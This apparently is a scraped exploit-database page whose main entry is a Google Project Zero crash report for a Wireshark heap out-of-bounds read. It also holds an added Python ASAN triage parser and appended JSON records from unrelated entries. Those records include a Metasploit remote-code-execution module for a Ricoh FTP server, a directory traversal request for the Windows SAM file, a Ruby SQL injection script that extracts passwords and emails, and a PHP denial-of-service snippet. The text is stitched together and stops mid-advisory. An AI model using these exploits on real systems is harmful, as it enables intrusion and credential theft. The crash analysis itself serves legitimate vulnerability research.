Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read
2016-05-13T00:00:00
ID: 1337DAY-ID-26008 | Type: zdt | Reporter: Google Security Research | Modified: 2016-05-13T00:00:00
Description: Exploit for multiple platforms in category dos / poc
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=740
The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==8910==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004558a4 bp 0x7fffa0f13710 sp 0x7fffa0f12ec0
READ of size 16385 at 0x61b00001335c thread T0
#0 0x4558a3 in memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438
#1 0x7f1d70c97b65 in g_memdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b65)
#2 0x7f1d78b4c531 in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:360:32
#3 0x7f1d78b4ba8c in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1522:21
#4 0x7f1d78b424f6 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:602:13
#5 0x7f1d78b40d28 in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:815:21
#6 0x7f1d79a70590 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17818:9
#7 0x7f1d79a44406 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18426:10
#8 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#9 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9
#10 0x7f1d7897c89d in dissector_try_uint_new wireshark/epan/packet.c:1160:9
#11 0x7f1d796c1235 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11
#12 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#13 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9
#14 0x7f1d78986c0e in call_dissector_only wireshark/epan/packet.c:2674:8
#15 0x7f1d7897839f in call_dissector_with_data wireshark/epan/packet.c:2687:8
#16 0x7f1d789778c1 in dissect_record wireshark/epan/packet.c:509:3
#17 0x7f1d7892ac99 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#18 0x52eebb in process_packet wireshark/tshark.c:3748:5
#19 0x5281ac in load_cap_file wireshark/tshark.c:3504:11
#20 0x51e4bc in main wireshark/tshark.c:2213:13
0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)
allocated by thread T0 here:
#0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f1d70c80610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x7f1d8543f638 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2
#3 0x5244dd in cf_open wireshark/tshark.c:4215:9
#4 0x51decd in main wireshark/tshark.c:2204:9
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438 in memcpy
Shadow bytes around the buggy address:
0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8910==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12175. Attached are three files which trigger the crash.
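As an added triage example (not part of the Project Zero report or of Wireshark's own code), the Python below parses the sanitizer report quoted above, checks that the 16385-byte read lies entirely past the end of the 1500-byte buffer allocated in wtap_open_offline, and picks the first in-project frame beneath the memcpy and g_memdup wrappers as the culprit, which gives a stable signature for bucketing duplicate fuzzer crashes. The trimmed sample report and the `project_prefix` argument are assumptions of this example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: the head of the ASAN report quoted in the advisory above,
# trimmed to a few frames per stack (the full access stack has 21 frames).
ASAN_REPORT = """\
==8910==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004558a4 bp 0x7fffa0f13710 sp 0x7fffa0f12ec0
READ of size 16385 at 0x61b00001335c thread T0
    #0 0x4558a3 in memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438
    #1 0x7f1d70c97b65 in g_memdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b65)
    #2 0x7f1d78b4c531 in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:360:32
    #3 0x7f1d78b4ba8c in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1522:21
0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)
allocated by thread T0 here:
    #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
    #1 0x7f1d70c80610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
    #2 0x7f1d8543f638 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438 in memcpy
"""

@dataclass
class Frame:
    function: str
    location: str  # "path/file.c:line:col", or "(/lib/libfoo.so+0xoff)" for stripped libraries

@dataclass
class AsanReport:
    kind: str                 # bug class, e.g. "heap-buffer-overflow"
    fault_addr: int
    access: str = ""          # "READ" or "WRITE"
    access_size: int = 0
    access_stack: List[Frame] = field(default_factory=list)
    alloc_stack: List[Frame] = field(default_factory=list)
    region_start: int = 0
    region_end: int = 0       # exclusive: ASAN prints the region as [start,end)
    region_size: int = 0
    distance: int = 0         # bytes between the region edge and the fault address
    side: str = ""            # "left" (underflow) or "right" (overflow)

_HEADER = re.compile(r"^==\d+==ERROR: AddressSanitizer: (\S+) on address (0x[0-9a-f]+)")
_ACCESS = re.compile(r"^(READ|WRITE) of size (\d+) at (0x[0-9a-f]+)")
_FRAME = re.compile(r"^\s*#\d+ 0x[0-9a-f]+ in (\S+) (.+)$")
_REGION = re.compile(r"is located (\d+) bytes to the (left|right) of (\d+)-byte region "
                     r"\[(0x[0-9a-f]+),(0x[0-9a-f]+)\)")

def parse_asan_report(text: str) -> AsanReport:
    """Parse the header, faulting access, both stacks and the region line of one report."""
    report: Optional[AsanReport] = None
    current: Optional[List[Frame]] = None   # stack that frame lines currently belong to
    for line in text.splitlines():
        if m := _HEADER.match(line):
            report = AsanReport(kind=m.group(1), fault_addr=int(m.group(2), 16))
            continue
        if report is None:
            continue  # ignore anything printed before the ERROR header
        if m := _ACCESS.match(line):
            report.access, report.access_size = m.group(1), int(m.group(2))
            current = report.access_stack
            continue
        if "allocated by thread" in line:
            current = report.alloc_stack
            continue
        if (m := _FRAME.match(line)) and current is not None:
            current.append(Frame(m.group(1), m.group(2).strip()))
            continue
        if m := _REGION.search(line):
            report.distance, report.side, report.region_size = int(m.group(1)), m.group(2), int(m.group(3))
            report.region_start, report.region_end = int(m.group(4), 16), int(m.group(5), 16)
    if report is None:
        raise ValueError("no AddressSanitizer ERROR header found")
    return report

def out_of_bounds_bytes(r: AsanReport) -> int:
    """Bytes of the faulting access outside the allocation (all of them when the fault address is the region end)."""
    acc_start, acc_end = r.fault_addr, r.fault_addr + r.access_size
    overlap = max(0, min(acc_end, r.region_end) - max(acc_start, r.region_start))
    return r.access_size - overlap

def culprit_frame(r: AsanReport, project_prefix: str) -> Optional[Frame]:
    """First access-stack frame in the project's sources; the interceptor (memcpy) and wrapper (g_memdup) are not the bug."""
    return next((f for f in r.access_stack if f.location.startswith(project_prefix)), None)

def crash_signature(r: AsanReport, project_prefix: str) -> str:
    """Bucketing key: bug class, access type and culprit at file:line (column dropped so line edits keep the bucket)."""
    f = culprit_frame(r, project_prefix)
    if f is None:
        return f"{r.kind}|{r.access}|unknown"
    file_line = ":".join(f.location.split(":")[:2])
    return f"{r.kind}|{r.access}|{f.function}|{file_line}"

if __name__ == "__main__":
    rep = parse_asan_report(ASAN_REPORT)
    print(crash_signature(rep, "wireshark/"), out_of_bounds_bytes(rep), "bytes out of bounds")
```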
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39812.zip
# 0day.today [2018-04-13] #
{"sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=740\r\n \r\nThe following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==8910==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004558a4 bp 0x7fffa0f13710 sp 0x7fffa0f12ec0\r\nREAD of size 16385 at 0x61b00001335c thread T0\r\n #0 0x4558a3 in memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438\r\n #1 0x7f1d70c97b65 in g_memdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b65)\r\n #2 0x7f1d78b4c531 in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:360:32\r\n #3 0x7f1d78b4ba8c in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1522:21\r\n #4 0x7f1d78b424f6 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:602:13\r\n #5 0x7f1d78b40d28 in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:815:21\r\n #6 0x7f1d79a70590 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17818:9\r\n #7 0x7f1d79a44406 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18426:10\r\n #8 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #9 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #10 0x7f1d7897c89d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #11 0x7f1d796c1235 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11\r\n #12 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #13 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #14 0x7f1d78986c0e in call_dissector_only wireshark/epan/packet.c:2674:8\r\n #15 0x7f1d7897839f in call_dissector_with_data wireshark/epan/packet.c:2687:8\r\n #16 0x7f1d789778c1 in dissect_record wireshark/epan/packet.c:509:3\r\n #17 0x7f1d7892ac99 in 
epan_dissect_run_with_taps wireshark/epan/epan.c:376:2\r\n #18 0x52eebb in process_packet wireshark/tshark.c:3748:5\r\n #19 0x5281ac in load_cap_file wireshark/tshark.c:3504:11\r\n #20 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\n0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)\r\nallocated by thread T0 here:\r\n #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7f1d70c80610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7f1d8543f638 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2\r\n #3 0x5244dd in cf_open wireshark/tshark.c:4215:9\r\n #4 0x51decd in main wireshark/tshark.c:2204:9\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438 in memcpy\r\nShadow bytes around the buggy address:\r\n 0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa\r\n 0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n 
Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==8910==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12175. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39812.zip\n\n# 0day.today [2018-04-13] #", "history": [], "description": "Exploit for multiple platform in category dos / poc", "sourceHref": "https://0day.today/exploit/26008", "reporter": "Google Security Research", "href": "https://0day.today/exploit/description/26008", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "cdc2aa401057df1e80c0829fd5fd09a7"}, {"key": "href", "hash": "a8a015bd6106138e733d10c90da401cc"}, {"key": "modified", "hash": "d4d064cfe0e4042b38911306aeefc42e"}, {"key": "published", "hash": "d4d064cfe0e4042b38911306aeefc42e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "81a8aed471c1b3b06ec573646a85f0f9"}, {"key": "sourceData", "hash": "d8a71c7972bf6f44e76d81eab4136574"}, {"key": "sourceHref", "hash": "f5e40f47bad6840f4dc8fa136a961873"}, {"key": "title", "hash": "4cd01baa98fff5a152e283cf643657ce"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 6, "references": [], "lastseen": "2018-04-13T07:50:41", "published": "2016-05-13T00:00:00", "objectVersion": "1.3", "cvelist": [], "id": "1337DAY-ID-26008", "hash": "ceded8df522e7fe00786c889c197c59e0c86e1be00e07e061c23872c833b04fc", "modified": "2016-05-13T00:00:00", "title": 
"Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-04-13T07:50:41"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-18426", "1337DAY-ID-17818", "1337DAY-ID-16385", "1337DAY-ID-12175", "1337DAY-ID-4883", "1337DAY-ID-4215", "1337DAY-ID-3748", "1337DAY-ID-3504", "1337DAY-ID-2687", "1337DAY-ID-2213"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26008"]}], "modified": "2018-04-13T07:50:41"}, "vulnersScore": -0.1}}
{"zdt": [{"lastseen": "2018-01-10T09:17:37", "bulletinFamily": "exploit", "description": "Exploit for php platform in category dos / poc", "modified": "2012-06-03T00:00:00", "published": "2012-06-03T00:00:00", "id": "1337DAY-ID-18426", "href": "https://0day.today/exploit/description/18426", "type": "zdt", "title": "PHP 5.3.10 spl_autoload_register() Local Denial of Service", "sourceData": "<?php\r\n#####################################################################\r\n## PHP 5.3.10 spl_autoload_register() Local Denial of Service\r\n## Tested on Windows 7 64bit, English, Apache, PHP 5.3.10\r\n## Date: 02/06/2012\r\n## Local Denial of Service\r\n## Bug discovered by Pr0T3cT10n, <[email\u00a0protected]>\r\n## ISRAEL\r\n## http://www.0x31337.net\r\n#####################################################################\r\n \r\n$buffer = str_repeat(\"A\",9999);\r\nspl_autoload_register($buffer);\r\n \r\n## Or..\r\n# spl_autoload_register($buffer,1,1); #Should work too.\r\n?>\r\n\r\n\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18426"}, {"lastseen": "2018-01-01T07:16:57", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2012-03-24T00:00:00", "published": "2012-03-24T00:00:00", "id": "1337DAY-ID-17818", "href": "https://0day.today/exploit/description/17818", "type": "zdt", "title": "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::Ftp\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP\r\n service. By supplying a long string of data to the USER command, it is\r\n possible to trigger a stack-based buffer overflow, which allows remote code\r\n execution under the context of the user.\r\n \r\n Please note that in order to trigger the vulnerability, the server must\r\n be configured with a log file name (by default, it's disabled).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Julien Ahrens', #Discovery, PoC\r\n 'sinn3r' #Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['OSVDB', '79691'],\r\n ['URL', 'http://secunia.com/advisories/47912'],\r\n ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']\r\n ],\r\n 'Payload' =>\r\n {\r\n # Yup, no badchars\r\n 'BadChars' => \"\\x00\",\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"process\",\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [\r\n 'Windows XP SP3',\r\n {\r\n 'Ret' => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll)\r\n 'Offset' => 245\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 1 2012\",\r\n 'DefaultTarget' => 0))\r\n \r\n # We're triggering the bug via the USER command, no point to have user/pass\r\n # as configurable options.\r\n deregister_options('FTPPASS', 'FTPUSER')\r\n end\r\n \r\n def check\r\n connect\r\n disconnect\r\n if banner =~ /220 DSC ftpd 1\\.0 FTP Server/\r\n return Exploit::CheckCode::Detected\r\n else\r\n return 
Exploit::CheckCode::Safe\r\n end\r\n end\r\n \r\n def exploit\r\n buf = ''\r\n buf << rand_text_alpha(target['Offset'], payload_badchars)\r\n buf << [target.ret].pack('V')\r\n buf << make_nops(20)\r\n buf << payload.encoded\r\n \r\n print_status(\"#{rhost}:#{rport} - Sending #{self.name}\")\r\n connect\r\n send_user(buf)\r\n handler\r\n disconnect\r\n end\r\nend\r\n \r\n=begin\r\n0:002> lmv m SR10\r\nstart end module name\r\n00400000 00410000 SR10 (deferred) \r\n Image path: C:\\Program Files\\DC Software\\SR10.exe\r\n Image name: SR10.exe\r\n Timestamp: Mon May 19 23:55:32 2008 (483275E4)\r\n CheckSum: 00000000\r\n ImageSize: 00010000\r\n File version: 1.0.0.520\r\n Product version: 1.0.0.0\r\n File flags: 0 (Mask 3F)\r\n File OS: 4 Unknown Win32\r\n File type: 1.0 App\r\n File date: 00000000.00000000\r\n Translations: 0409.04b0\r\n CompanyName: Ricoh Co.,Ltd.\r\n ProductName: SR-10\r\n InternalName: SR-10\r\n OriginalFilename: SR10.EXE\r\n ProductVersion: 1, 0, 0, 0\r\n FileVersion: 1, 0, 0, 520\r\n PrivateBuild: 1, 0, 0, 520\r\n SpecialBuild: 1, 0, 0, 520\r\n FileDescription: SR-10\r\n \r\n \r\nNote: No other DC Software dlls are loaded when SR-10.exe is running, so the most\r\nstable component we can use is msvcrt.dll for now.\r\n=end\r\n\r\n\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17818"}, {"lastseen": "2018-03-13T14:10:42", "bulletinFamily": "exploit", "description": "Exploit for jsp platform in category web applications", "modified": "2011-06-23T00:00:00", "published": "2011-06-23T00:00:00", "id": "1337DAY-ID-16385", "href": "https://0day.today/exploit/description/16385", "type": "zdt", "title": "ManageEngine Service Desk Plus 8.0 Directory Traversal Vulnerability", "sourceData": "Google Dork: ie: intitle:ManageEngine ServiceDesk Plus\"\r\nAuthor: Keith Lee [email\u00a0protected]\r\nSoftware Link: 
http://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus.exe\r\nVersion: 8.0\r\n \r\nDescription:\r\n \r\nDirectory traversal vulnerabilities has been found in ManageEngine\r\nServiceDesk Plus 8.0 a web\r\nbased helpdesk system written in Java.\r\n \r\nThe vulnerability can be exploited to access local files by entering\r\nspecial characters in variables used to create file paths. The attackers\r\nuse \u00ef\u00bf\u00bd../\u00ef\u00bf\u00bd sequences to move up to root directory, thus permitting\r\nnavigation through the file system.\r\n \r\nRequest:\r\nGET http://[webserver\r\nIP]:8080/workorder/FileDownload.jsp?module=agent&&FILENAME=%20..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\repair\\SAM\r\n \r\nThe issue is fixed with Service Pack Build 8012 found in the below link.\r\nhttp://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus_8_0_0_SP-0_12_0.ppm\r\n\r\n\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16385"}, {"lastseen": "2018-04-14T03:49:37", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-05-09T00:00:00", "published": "2010-05-09T00:00:00", "id": "1337DAY-ID-12175", "href": "https://0day.today/exploit/description/12175", "type": "zdt", "title": "phpscripte24 Shop System SQL Injection Vulnerability Exploit", "sourceData": "============================================================\r\nphpscripte24 Shop System SQL Injection Vulnerability Exploit\r\n============================================================\r\n\r\n----------------------------Information------------------------------------------------\r\n+Name : phpscripte24 Shop System SQL Injection Vulnerability Exploit\r\n+Autor : Easy Laster\r\n+ICQ : 11-051-551\r\n+Date : 09.05.2010\r\n+Script : phpscripte24 Shop System\r\n+Price : 69.99 ?\r\n+Language :PHP\r\n+Discovered by Easy Laster 
4004-security-project.com\r\n+Security Group Undergroundagents and 4004-Security-Project 4004-security-project.com\r\n+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,\r\nKiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,\r\nN00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox.\r\n \r\n---------------------------------------------------------------------------------------\r\n \r\n ___ ___ ___ ___ _ _ _____ _ _\r\n| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_\r\n|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|\r\n |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|\r\n |___| |___| \r\n \r\n \r\n----------------------------------------------------------------------------------------\r\n+Vulnerability : www.site.com/shop/index.php?site=content&id=\r\n----------------------------------------------------------------------------------------\r\n#!/usr/bin/ruby\r\n#4004-security-project.com\r\n#Discovered and vulnerability by Easy Laster\r\nrequire 'net/http'\r\nprint \"\r\n#########################################################\r\n# 4004-Security-Project.com #\r\n#########################################################\r\n# phpscripte24 Shop System SQL Injection Vulnerability #\r\n# Exploit #\r\n# Using Host+Path+userid+prefix #\r\n# demo.com /shop/ 1 user #\r\n# Easy Laster #\r\n#########################################################\r\n\"\r\nblock = \"#########################################################\"\r\nprint \"\"+ block +\"\"\r\nprint \"\\nEnter host name (site.com)->\"\r\nhost=gets.chomp\r\nprint \"\"+ block +\"\"\r\nprint \"\\nEnter script path (/forum/)->\"\r\npath=gets.chomp\r\nprint \"\"+ block +\"\"\r\nprint \"\\nEnter userid (userid)->\"\r\nuserid=gets.chomp\r\nprint \"\"+ block +\"\"\r\nprint \"\\nEnter prefix (prefix z.b user)->\"\r\nprefix=gets.chomp\r\nprint \"\"+ block +\"\"\r\nbegin\r\ndir = 
\"index.php?site=content&id=99999999999/**/UNION/**/SELECT/**/1,2,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23)/**/FROM/**/\"+ prefix +\"/**/WHERE/**/id=\"+ userid +\"\"\r\nhttp = Net::HTTP.new(host, 80)\r\nresp= http.get(path+dir)\r\nprint \"\\nThe ID is -> \"+(/#####(.+)#####/).match(resp.body)[1]\r\ndir = \"index.php?site=content&id=99999999999/**/UNION/**/SELECT/**/1,2,concat(0x23,0x23,0x23,0x23,0x23,passwort,0x23,0x23,0x23,0x23,0x23)/**/FROM/**/\"+ prefix +\"/**/WHERE/**/id=\"+ userid +\"\"\r\nhttp = Net::HTTP.new(host, 80)\r\nresp= http.get(path+dir)\r\nprint \"\\nThe Password is -> \"+(/#####(.+)#####/).match(resp.body)[1]\r\ndir = \"index.php?site=content&id=99999999999/**/UNION/**/SELECT/**/1,2,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23)/**/FROM/**/\"+ prefix +\"/**/WHERE/**/id=\"+ userid +\"\"\r\nhttp = Net::HTTP.new(host, 80)\r\nresp= http.get(path+dir)\r\nprint \"\\nThe Email is -> \"+(/#####(.+)#####/).match(resp.body)[1]\r\nrescue\r\nprint \"\\nExploit failed\"\r\nend\r\n\r\n\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/12175"}, {"lastseen": "2018-04-08T22:57:23", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-02-25T00:00:00", "published": "2009-02-25T00:00:00", "id": "1337DAY-ID-4883", "href": "https://0day.today/exploit/description/4883", "type": "zdt", "title": "pPIM 1.0 Multiple Remote Vulnerabilities", "sourceData": "========================================\r\npPIM 1.0 Multiple Remote Vulnerabilities\r\n========================================\r\n\r\n\r\n- -= pPIM Multiple Vulnerabilities =-\r\n\r\nVersion Tested: pPIM 1.0\r\nVendor notified\r\nAuthor: Justin C. 
Klein Keane \r\n\r\nDescription\r\n\r\npPIM (http://www.phlatline.org/index.php?page=prod-ppim) is a Personal\r\nInformation Management application written in PHP that can store\r\ncontacts (including their photos), events, links, notes, send and check\r\nemail, and upload files. pPIM came to my attention recently with the\r\npublishing on Milw0rm of exploit code designed to facilitate remote\r\ncommand execution (http://www.milw0rm.com/exploits/8093). As there is a\r\nmilw0rm exploit already posted it is likely malicious users are already\r\nexploiting pPIM. I decided to have a closer look at pPIM and, quite\r\nfrankly, was horrified by what I found. pPIM contains multiple\r\nvulnerabilities, from version information leakage, to system credential\r\ndisclosure, to remote command execution, authentication bypass and cross\r\nsite scripting vulnerabilities. Possibly the only class of\r\nvulnerability pPIM is not exposed to is SQL injection as it doesn't\r\nemploy any database back end. That said, there seemed to be nothing in\r\nthe way of security other than an easily bypassable GET variable check\r\nin the header, present in pPIM. The following is a brief synopsis of my\r\nfindings, although I gave up investigation at after discovering so many\r\nflaws in the application's architecture with respect to security.\r\n\r\nVersion Information Leakage:\r\n\r\nBy calling the URL http://target.tld/ppim/Readme.txt you can view the\r\nversion information of the installed version of pPIM.\r\n\r\nPassword Hash Disclosure:\r\n\r\nBy requesting the URL http://target.tld/ppim/password.dat the password\r\nhash is revealed. 
